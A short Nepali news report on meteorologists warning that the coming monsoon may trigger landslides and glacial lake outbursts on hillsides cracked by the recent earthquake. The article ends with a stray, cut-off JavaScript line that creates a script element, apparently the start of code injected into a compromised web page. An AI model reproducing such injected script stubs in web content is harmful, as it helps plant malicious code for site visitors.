मौसमविद्हरुले आगामी मनसुन सुखद् नभएकाले आमनागरिकलाई सजक भएर बस्न आग्रह गरेका छन। हप्ता दिन पछि मनुसुन शुरु हुने र महाभूकम्पले पहाडका धेरै स्थानहरु धुजा धुजा परेकाले पहिरो जान सक्ने हुँदा सजक रहन आग्रह गरेका हुन। रफत सञ्चार क्लब भक्तपुरले मंगलवार गरेको साक्षातकार कार्यक्रममा मौसम तथा जल विज्ञान विभागका महानिर्देशक
ऋषिराम शर्माले भूकम्पले जमिनको सतहलाई हल्लाएको र जमिनको मुनीको पानी सहतमा परिवर्तन देखा परेकले वर्षातको समयमा थप जोखिम निम्त्याउने भन्दै सजक रहनुपर्नेमा जोड दिनुभयो। नेपालका हिमताल फुट्न सक्ने खतरा भएको चर्चा गर्दै सरकार अहिलेदेखि नै सजक बन्नु पर्ने शर्माको भनाइ छ।
अर्का मौसमविद् सुदिप कायस्थले वर्षातको समय प्रतिकुल हुने भएकाले किसानहरुलाई सबै भन्दा बढि मार पर्ने बताउनुभयो। भूकम्पले फाटेको जमिनबाट पानी तल छिर्ने र त्यसले पहिरो निम्त्याउन सक्ने हुँदा सजक रहन उहाँले जोड दिनुभयो।
var d=document;var s=d.createElement(‘script’);